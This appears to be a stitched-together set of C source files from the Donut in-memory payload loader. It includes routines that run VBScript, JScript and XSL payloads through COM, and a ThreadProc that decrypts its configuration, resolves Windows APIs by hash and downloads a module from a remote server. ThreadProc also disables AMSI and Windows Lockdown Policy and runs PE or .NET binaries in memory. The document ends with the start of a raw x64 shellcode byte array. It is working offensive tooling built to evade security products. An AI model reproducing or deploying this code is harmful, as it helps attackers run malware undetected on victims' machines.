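      // MEM_RELEASE and MEM_DECOMMIT are documented as mutually exclusive;
      // passing both made this call fail and left the RWX image mapped.
      inst->api.VirtualFree(cs, 0, MEM_RELEASE);
    }
}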
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
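// Run a script payload through the Active Script engine identified by
// inst->xCLSID_ScriptLanguage, exposing a minimal IActiveScriptSite and a
// host object named inst->wscript (vtables come from activescript.c and
// wscript.c, built on the stack).
//
// The script is converted from the bytes in mod->data to a UTF-16 buffer that
// is zeroed and released once the engine has finished; SetScriptState blocks
// until the script returns.
//
// Fixes over the previous revision: CoInitializeEx's S_FALSE ("already
// initialised on this thread") was treated as failure and the script never
// ran; the WCHAR count passed to MultiByteToWideChar was in bytes, overstating
// the buffer by 2x; COM was never uninitialised; VirtualFree was given
// MEM_DECOMMIT|MEM_RELEASE, which it rejects, so the buffer stayed mapped.
VOID RunScript(PDONUT_INSTANCE inst) {
    HRESULT                hr;
    IActiveScriptParse     *parser;
    IActiveScript          *engine;
    MyIActiveScriptSite    mas;
    IActiveScriptSiteVtbl  activescript_vtbl;
    IHostVtbl              wscript_vtbl;
    PDONUT_MODULE          mod;
    PWCHAR                 script;
    ULONG64                len;        // size of the WCHAR buffer, in bytes
    BSTR                   obj;

    if(inst->type == DONUT_INSTANCE_PIC) {
      DPRINT("Using module embedded in instance");
      mod = (PDONUT_MODULE)&inst->module.x;
    } else {
      DPRINT("Loading module from allocated memory");
      mod = inst->module.p;
    }

    // 1. Allocate RW memory for unicode format of script (+1 for the terminator)
    len    = (inst->mod_len + 1) * sizeof(WCHAR);
    script = (PWCHAR)inst->api.VirtualAlloc(
      NULL,
      len,
      MEM_COMMIT | MEM_RESERVE,
      PAGE_READWRITE);

    if(script != NULL) {
      // 2. Convert string to unicode.  cchWideChar counts WCHARs and the
      // buffer holds mod_len + 1 of them.  cbMultiByte == -1 assumes the
      // generator NUL-terminated mod->data -- TODO confirm.
      inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
        -1, script, (int)(inst->mod_len + 1));

      // 3. we're using stack memory for the virtual function tables
      mas.site.lpVtbl = (IActiveScriptSiteVtbl*)&activescript_vtbl;
      ActiveScript_New(inst, &mas.site);

      mas.wscript.lpVtbl = (IHostVtbl*)&wscript_vtbl;
      Host_New(inst, &mas.wscript);

      mas.siteWnd.lpVtbl = NULL;

      // 4. Initialize COM, MyIActiveScriptSite and event for OnLeaveScript method
      DPRINT("CoInitializeEx");
      hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);

      // S_FALSE is also success (COM already up on this thread) and must
      // still be balanced by CoUninitialize.
      if(SUCCEEDED(hr)) {
        // 5. Instantiate the active script engine
        DPRINT("CoCreateInstance(IID_IActiveScript)");

        hr = inst->api.CoCreateInstance(
          &inst->xCLSID_ScriptLanguage, 0,
          CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
          &inst->xIID_IActiveScript, (void **)&engine);

        if(hr == S_OK) {
          // 6. Get IActiveScriptParse object from engine
          DPRINT("IActiveScript::QueryInterface(IActiveScriptParse)");

          hr = engine->lpVtbl->QueryInterface(
            engine,
#ifdef _WIN64
            &inst->xIID_IActiveScriptParse64,
#else
            &inst->xIID_IActiveScriptParse32,
#endif
            (void **)&parser);

          if(hr == S_OK) {
            // 7. Initialize parser
            DPRINT("IActiveScriptParse::InitNew");
            hr = parser->lpVtbl->InitNew(parser);

            if(hr == S_OK) {
              // 8. Set custom script interface
              DPRINT("IActiveScript::SetScriptSite");
              mas.wscript.lpEngine = engine;

              hr = engine->lpVtbl->SetScriptSite(
                engine, (IActiveScriptSite *)&mas);

              if(hr == S_OK) {
                DPRINT("IActiveScript::AddNamedItem(\"%ws\")", inst->wscript);
                obj = inst->api.SysAllocString(inst->wscript);
                hr = engine->lpVtbl->AddNamedItem(engine, (LPCOLESTR)obj, SCRIPTITEM_ISVISIBLE);
                inst->api.SysFreeString(obj);

                if(hr == S_OK) {
                  // 9. Load script
                  DPRINT("IActiveScriptParse::ParseScriptText");
                  hr = parser->lpVtbl->ParseScriptText(
                    parser, (LPCOLESTR)script, NULL, NULL, NULL, 0, 0, 0, NULL, NULL);

                  if(hr == S_OK) {
                    // 10. Run script
                    DPRINT("IActiveScript::SetScriptState(SCRIPTSTATE_CONNECTED)");
                    hr = engine->lpVtbl->SetScriptState(
                      engine, SCRIPTSTATE_CONNECTED);

                    // SetScriptState blocks here
                  }
                }
              }
            }
            DPRINT("IActiveScriptParse::Release");
            parser->lpVtbl->Release(parser);
          }
          DPRINT("IActiveScript::Close");
          engine->lpVtbl->Close(engine);

          DPRINT("IActiveScript::Release");
          engine->lpVtbl->Release(engine);
        }
        DPRINT("CoUninitialize");
        inst->api.CoUninitialize();
      }
      DPRINT("Erasing script from memory");
      Memset(script, 0, len);

      DPRINT("VirtualFree(script)");
      inst->api.VirtualFree(script, 0, MEM_RELEASE);
    }
}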
153 | ||
154 | #include "activescript.c" | |
155 | #include "wscript.c" |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
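// Execute an XSL payload by loading it into an MSXML 3.0 DOMDocument and
// calling transformNode on itself, which runs any embedded script.
//
// The stylesheet is converted from the bytes in mod->data to a UTF-16 buffer
// that is zeroed and released afterwards.
//
// Fixes over the previous revision: CoInitializeEx's S_FALSE was treated as
// failure (nothing ran if COM was already up on this thread); the WCHAR count
// passed to MultiByteToWideChar was in bytes; the BSTR returned by
// transformNode leaked; `loaded` was read even when loadXML failed to set
// it; VirtualFree was called with MEM_DECOMMIT|MEM_RELEASE, which it
// rejects, so the buffer stayed mapped.
VOID RunXSL(PDONUT_INSTANCE inst) {
    IXMLDOMDocument *pDoc;
    IXMLDOMNode     *pNode;
    HRESULT         hr;
    PWCHAR          xsl_str;
    VARIANT_BOOL    loaded = VARIANT_FALSE;
    BSTR            res    = NULL;
    PDONUT_MODULE   mod;
    ULONG64         len;        // size of the WCHAR buffer, in bytes

    if(inst->type == DONUT_INSTANCE_PIC) {
      DPRINT("Using module embedded in instance");
      mod = (PDONUT_MODULE)&inst->module.x;
    } else {
      DPRINT("Loading module from allocated memory");
      mod = inst->module.p;
    }

    // 1. Allocate RW memory for unicode format of script (+1 for the terminator)
    len     = (inst->mod_len + 1) * sizeof(WCHAR);
    xsl_str = (PWCHAR)inst->api.VirtualAlloc(
      NULL,
      len,
      MEM_COMMIT | MEM_RESERVE,
      PAGE_READWRITE);

    if(xsl_str != NULL) {
      // 2. Convert string to unicode.  cchWideChar counts WCHARs and the
      // buffer holds mod_len + 1 of them.  cbMultiByte == -1 assumes the
      // generator NUL-terminated mod->data -- TODO confirm.
      inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
        -1, xsl_str, (int)(inst->mod_len + 1));

      // 3. Initialize COM (S_FALSE == already initialised, still success)
      DPRINT("CoInitializeEx");
      hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);

      if(SUCCEEDED(hr)) {
        // 4. Instantiate XMLDOMDocument object
        DPRINT("CoCreateInstance");
        hr = inst->api.CoCreateInstance(
          &inst->xCLSID_DOMDocument30,
          NULL, CLSCTX_INPROC_SERVER,
          &inst->xIID_IXMLDOMDocument,
          (void**)&pDoc);

        if(hr == S_OK) {
          // 5. load XSL file.  loadXML takes a BSTR but only reads the
          // characters, so the plain WCHAR buffer is passed as in the original.
          DPRINT("IXMLDOMDocument::loadXML");
          hr = pDoc->lpVtbl->loadXML(pDoc, (BSTR)xsl_str, &loaded);
          DPRINT("HRESULT: %08lx loaded : %s",
            hr, loaded ? "TRUE" : "FALSE");

          if(hr == S_OK && loaded) {
            // 6. query node interface
            DPRINT("IXMLDOMDocument::QueryInterface");
            hr = pDoc->lpVtbl->QueryInterface(
              pDoc, &inst->xIID_IXMLDOMNode, (void **)&pNode);

            if(hr == S_OK) {
              DPRINT("HRESULT: %08lx", hr);
              // 7. execute script
              DPRINT("IXMLDOMDocument::transformNode");
              hr = pDoc->lpVtbl->transformNode(pDoc, pNode, &res);
              DPRINT("HRESULT: %08lx", hr);

              // the transform output is a caller-owned BSTR
              if(res != NULL) {
                inst->api.SysFreeString(res);
                res = NULL;
              }
              pNode->lpVtbl->Release(pNode);
            }
          }
          pDoc->lpVtbl->Release(pDoc);
        }
        DPRINT("CoUninitialize");
        inst->api.CoUninitialize();
      }
      DPRINT("Erasing XSL from memory.");
      Memset(xsl_str, 0, len);

      DPRINT("VirtualFree()");
      inst->api.VirtualFree(xsl_str, 0, MEM_RELEASE);
    }
}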
0 | ThreadProc⏎ |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #include "payload.h" | |
32 | ||
33 | DWORD ThreadProc(LPVOID lpParameter) { | |
34 | ULONG i, ofs; | |
35 | ULONG64 sig; | |
36 | PDONUT_INSTANCE inst = (PDONUT_INSTANCE)lpParameter; | |
37 | DONUT_ASSEMBLY assembly; | |
38 | PDONUT_MODULE mod; | |
39 | VirtualAlloc_t _VirtualAlloc; | |
40 | VirtualFree_t _VirtualFree; | |
41 | LPVOID pv; | |
42 | ULONG64 hash; | |
43 | BOOL disabled; | |
44 | ||
45 | DPRINT("Maru IV : %" PRIX64, inst->iv); | |
46 | ||
47 | hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualAlloc) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)]; | |
48 | DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash); | |
49 | _VirtualAlloc = (VirtualAlloc_t)xGetProcAddress(inst, hash, inst->iv); | |
50 | ||
51 | hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualFree) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)]; | |
52 | DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash); | |
53 | _VirtualFree = (VirtualFree_t) xGetProcAddress(inst, hash, inst->iv); | |
54 | ||
55 | if(_VirtualAlloc == NULL || _VirtualFree == NULL) { | |
56 | DPRINT("FAILED!."); | |
57 | return -1; | |
58 | } | |
59 | ||
60 | DPRINT("VirtualAlloc : %p VirtualFree : %p", | |
61 | (LPVOID)_VirtualAlloc, (LPVOID)_VirtualFree); | |
62 | ||
63 | DPRINT("Allocating %i bytes of RW memory", inst->len); | |
64 | pv = _VirtualAlloc(NULL, inst->len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); | |
65 | ||
66 | if(pv == NULL) { | |
67 | DPRINT("Memory allocation failed..."); | |
68 | return -1; | |
69 | } | |
70 | DPRINT("Copying %i bytes of data to memory %p", inst->len, pv); | |
71 | Memcpy(pv, lpParameter, inst->len); | |
72 | inst = (PDONUT_INSTANCE)pv; | |
73 | ||
74 | DPRINT("Zero initializing PDONUT_ASSEMBLY"); | |
75 | Memset(&assembly, 0, sizeof(assembly)); | |
76 | ||
77 | #if !defined(NOCRYPTO) | |
78 | PBYTE inst_data; | |
79 | // load pointer to data just past len + key | |
80 | inst_data = (PBYTE)inst + offsetof(DONUT_INSTANCE, api_cnt); | |
81 | ||
82 | DPRINT("Decrypting %li bytes of instance", inst->len); | |
83 | ||
84 | donut_decrypt(inst->key.mk, | |
85 | inst->key.ctr, | |
86 | inst_data, | |
87 | inst->len - offsetof(DONUT_INSTANCE, api_cnt)); | |
88 | ||
89 | DPRINT("Generating hash to verify decryption"); | |
90 | ULONG64 mac = maru(inst->sig, inst->iv); | |
91 | DPRINT("Instance : %016llx | Result : %016llx", inst->mac, mac); | |
92 | ||
93 | if(mac != inst->mac) { | |
94 | DPRINT("Decryption of instance failed"); | |
95 | goto erase_memory; | |
96 | } | |
97 | #endif | |
98 | DPRINT("Resolving LoadLibraryA"); | |
99 | ||
100 | inst->api.addr[0] = xGetProcAddress(inst, inst->api.hash[0], inst->iv); | |
101 | if(inst->api.addr[0] == NULL) return -1; | |
102 | ||
103 | for(i=0; i<inst->dll_cnt; i++) { | |
104 | DPRINT("Loading %s ...", inst->dll_name[i]); | |
105 | inst->api.LoadLibraryA(inst->dll_name[i]); | |
106 | } | |
107 | ||
108 | DPRINT("Resolving %i API", inst->api_cnt); | |
109 | ||
110 | for(i=1; i<inst->api_cnt; i++) { | |
111 | DPRINT("Resolving API address for %016llX", inst->api.hash[i]); | |
112 | ||
113 | inst->api.addr[i] = xGetProcAddress(inst, inst->api.hash[i], inst->iv); | |
114 | ||
115 | if(inst->api.addr[i] == NULL) { | |
116 | DPRINT("Failed to resolve API"); | |
117 | goto erase_memory; | |
118 | } | |
119 | } | |
120 | ||
121 | if(inst->type == DONUT_INSTANCE_URL) { | |
122 | DPRINT("Instance is URL"); | |
123 | if(!DownloadModule(inst)) goto erase_memory; | |
124 | } | |
125 | ||
126 | if(inst->type == DONUT_INSTANCE_PIC) { | |
127 | DPRINT("Using module embedded in instance"); | |
128 | mod = (PDONUT_MODULE)&inst->module.x; | |
129 | } else { | |
130 | DPRINT("Loading module from allocated memory"); | |
131 | mod = inst->module.p; | |
132 | } | |
133 | ||
134 | // try bypassing AMSI and WLDP? | |
135 | if(inst->bypass != DONUT_BYPASS_SKIP) { | |
136 | // Try to disable AMSI | |
137 | disabled = DisableAMSI(inst); | |
138 | DPRINT("DisableAMSI %s", disabled ? "OK" : "FAILED"); | |
139 | if(!disabled && inst->bypass == DONUT_BYPASS_ABORT) | |
140 | goto erase_memory; | |
141 | ||
142 | // Try to disable WLDP | |
143 | disabled = DisableWLDP(inst); | |
144 | DPRINT("DisableWLDP %s", disabled ? "OK" : "FAILED"); | |
145 | if(!disabled && inst->bypass == DONUT_BYPASS_ABORT) | |
146 | goto erase_memory; | |
147 | } | |
148 | ||
149 | // unmanaged EXE/DLL? | |
150 | if(mod->type == DONUT_MODULE_DLL || | |
151 | mod->type == DONUT_MODULE_EXE) { | |
152 | RunPE(inst); | |
153 | } else | |
154 | // .NET EXE/DLL? | |
155 | if(mod->type == DONUT_MODULE_NET_DLL || | |
156 | mod->type == DONUT_MODULE_NET_EXE) | |
157 | { | |
158 | if(LoadAssembly(inst, &assembly)) { | |
159 | RunAssembly(inst, &assembly); | |
160 | } | |
161 | FreeAssembly(inst, &assembly); | |
162 | } else | |
163 | // vbs or js? | |
164 | if(mod->type == DONUT_MODULE_VBS || | |
165 | mod->type == DONUT_MODULE_JS) | |
166 | { | |
167 | RunScript(inst); | |
168 | } else | |
169 | // xsl? | |
170 | if(mod->type == DONUT_MODULE_XSL) { | |
171 | RunXSL(inst); | |
172 | } | |
173 | ||
174 | erase_memory: | |
175 | // if module was downloaded | |
176 | if(inst->type == DONUT_INSTANCE_URL) { | |
177 | if(inst->module.p != NULL) { | |
178 | // overwrite memory with zeros | |
179 | Memset(inst->module.p, 0, (DWORD)inst->mod_len); | |
180 | ||
181 | // free memory | |
182 | inst->api.VirtualFree(inst->module.p, 0, MEM_RELEASE | MEM_DECOMMIT); | |
183 | inst->module.p = NULL; | |
184 | } | |
185 | } | |
186 | ||
187 | DPRINT("Erasing RW memory for instance"); | |
188 | Memset(inst, 0, inst->len); | |
189 | ||
190 | DPRINT("Releasing RW memory for instance"); | |
191 | _VirtualFree(inst, 0, MEM_DECOMMIT | MEM_RELEASE); | |
192 | ||
193 | return 0; | |
194 | } | |
195 | ||
196 | #include "http_client.c" // For downloading module | |
197 | ||
198 | #include "inmem_dotnet.c" // .NET assemblies | |
199 | #include "inmem_pe.c" // Unmanaged PE/DLL files | |
200 | #include "inmem_xsl.c" // XSL files | |
201 | #include "inmem_script.c" // VBS/JS files | |
202 | ||
203 | #include "peb.c" // resolve functions in export table | |
204 | ||
205 | #include "bypass.c" // Bypass AMSI and WLDP | |
206 | #include "getpc.c" // code stub to return program counter (always at the end!) | |
207 | ||
208 | // the following code is *only* for development purposes | |
209 | // given an instance file, it will run as if running on a target system | |
210 | // attach a debugger to host process | |
211 | #ifdef DEBUG | |
212 | ||
213 | #include <stdio.h> | |
214 | #include <string.h> | |
215 | #include <stdlib.h> | |
216 | #include <sys/stat.h> | |
217 | ||
218 | int main(int argc, char *argv[]) { | |
219 | FILE *fd; | |
220 | struct stat fs; | |
221 | PDONUT_INSTANCE inst; | |
222 | DWORD old; | |
223 | ||
224 | if(argc != 2) { | |
225 | printf(" [ usage: payload <instance>\n"); | |
226 | return 0; | |
227 | } | |
228 | // get size of instance | |
229 | if(stat(argv[1], &fs) != 0) { | |
230 | printf(" [ unable to obtain size of instance.\n"); | |
231 | return 0; | |
232 | } | |
233 | ||
234 | // zero size? | |
235 | if(fs.st_size == 0) { | |
236 | printf(" [ invalid instance.\n"); | |
237 | return 0; | |
238 | } | |
239 | ||
240 | // try open for reading | |
241 | fd = fopen(argv[1], "rb"); | |
242 | if(fd == NULL) { | |
243 | printf(" [ unable to open %s.\n", argv[1]); | |
244 | return 0; | |
245 | } | |
246 | ||
247 | // allocate memory | |
248 | inst = (PDONUT_INSTANCE)VirtualAlloc(NULL, fs.st_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); | |
249 | ||
250 | if(inst != NULL) { | |
251 | fread(inst, 1, fs.st_size, fd); | |
252 | ||
253 | // change protection to PAGE_EXECUTE_READ | |
254 | if(VirtualProtect((LPVOID)inst, fs.st_size, PAGE_EXECUTE_READ, &old)) { | |
255 | printf("Running..."); | |
256 | ||
257 | // run payload with instance | |
258 | ThreadProc(inst); | |
259 | } | |
260 | // deallocate | |
261 | VirtualFree((LPVOID)inst, 0, MEM_DECOMMIT | MEM_RELEASE); | |
262 | } | |
263 | fclose(fd); | |
264 | return 0; | |
265 | } | |
266 | #endif |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef PAYLOAD_H | |
32 | #define PAYLOAD_H | |
33 | ||
34 | #if !defined(_MSC_VER) | |
35 | #define __out_ecount_full(x) | |
36 | #define __out_ecount_full_opt(x) | |
37 | #include <inttypes.h> | |
38 | #endif | |
39 | ||
40 | #include <windows.h> | |
41 | #include <wincrypt.h> | |
42 | #include <oleauto.h> | |
43 | #include <objbase.h> | |
44 | #include <wininet.h> | |
45 | ||
46 | #pragma comment(lib, "wininet.lib") | |
47 | #pragma comment(lib, "advapi32.lib") | |
48 | #pragma comment(lib, "crypt32.lib") | |
49 | ||
50 | #if defined(DEBUG) | |
51 | #include <stdio.h> | |
52 | #include <string.h> | |
53 | ||
54 | #define __FILENAME__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__) | |
55 | ||
56 | #define DPRINT(...) { \ | |
57 | fprintf(stderr, "\nDEBUG: %s:%d:%s(): ", __FILENAME__, __LINE__, __FUNCTION__); \ | |
58 | fprintf(stderr, __VA_ARGS__); \ | |
59 | } | |
60 | #else | |
61 | #define DPRINT(...) // Don't do anything in release builds | |
62 | #endif | |
63 | ||
64 | #define STATIC_KEY ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \ | |
65 | (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \ | |
66 | (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000) | |
67 | ||
68 | // Relative Virtual Address to Virtual Address | |
69 | #define RVA2VA(type, base, rva) (type)((ULONG_PTR) base + rva) | |
70 | ||
71 | #if defined(_M_IX86) || defined(__i386__) | |
72 | // return pointer to code in memory | |
73 | char *get_pc(void); | |
74 | ||
75 | // PC-relative addressing for x86 code. Similar to RVA2VA except using functions in payload | |
76 | #define ADR(type, addr) (type)(get_pc() - ((ULONG_PTR)&get_pc - (ULONG_PTR)addr)) | |
77 | #else | |
78 | #define ADR(type, addr) (type)(addr) // do nothing on 64-bit | |
79 | #endif | |
80 | ||
81 | void *Memset(void *ptr, int value, size_t num); | |
82 | void *Memcpy(void *destination, const void *source, size_t num); | |
83 | int Memcmp(const void *ptr1, const void *ptr2, size_t num); | |
84 | ||
85 | #if !defined(_MSC_VER) | |
86 | #define memcmp(x,y,z) Memcmp(x,y,z) | |
87 | #endif | |
88 | ||
89 | #include "peb.h" // Process Environment Block | |
90 | #include "winapi.h" // Prototypes | |
91 | #include "clr.h" // Common Language Runtime Interface | |
92 | ||
93 | #include "donut.h" | |
94 | ||
95 | #include "amsi.h" // Anti-malware Scan Interface | |
96 | #include "activescript.h" // Interfaces for executing VBS/JS files | |
97 | #include "wscript.h" // Interfaces to support WScript object | |
98 | ||
99 | typedef struct { | |
100 | IActiveScriptSite site; | |
101 | IActiveScriptSiteWindow siteWnd; | |
102 | IHost wscript; | |
103 | HANDLE hEvent; | |
104 | PDONUT_INSTANCE inst; // | |
105 | } MyIActiveScriptSite; | |
106 | ||
107 | // internal structure | |
108 | typedef struct _DONUT_ASSEMBLY { | |
109 | ICLRMetaHost *icmh; | |
110 | ICLRRuntimeInfo *icri; | |
111 | ICorRuntimeHost *icrh; | |
112 | IUnknown *iu; | |
113 | AppDomain *ad; | |
114 | Assembly *as; | |
115 | Type *type; | |
116 | MethodInfo *mi; | |
117 | } DONUT_ASSEMBLY, *PDONUT_ASSEMBLY; | |
118 | ||
119 | // Downloads a module from remote HTTP server into memory | |
120 | BOOL DownloadModule(PDONUT_INSTANCE); | |
121 | ||
122 | // .NET DLL/EXE | |
123 | BOOL LoadAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY); | |
124 | BOOL RunAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY); | |
125 | VOID FreeAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY); | |
126 | ||
127 | // Extensible Stylesheet Language Transformations | |
128 | VOID RunXSL(PDONUT_INSTANCE); | |
129 | ||
130 | // In-Memory execution of native DLL | |
131 | VOID RunPE(PDONUT_INSTANCE); | |
132 | ||
133 | // VBS / JS files | |
134 | VOID RunScript(PDONUT_INSTANCE); | |
135 | ||
136 | // Disables Antimalware Scan Interface | |
137 | BOOL DisableAMSI(PDONUT_INSTANCE); | |
138 | ||
139 | // Disables Windows Lockdown Policy | |
140 | BOOL DisableWLDP(PDONUT_INSTANCE); | |
141 | ||
142 | LPVOID xGetProcAddress(PDONUT_INSTANCE, ULONGLONG, ULONGLONG); | |
143 | ||
144 | #endif |
0 | ||
1 | unsigned char PAYLOAD_EXE_X64[] = { | |
2 | 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48, | |
3 | 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8, 0x48, | |
4 | 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x89, 0x45, 0xe0, 0x48, | |
5 | 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48, | |
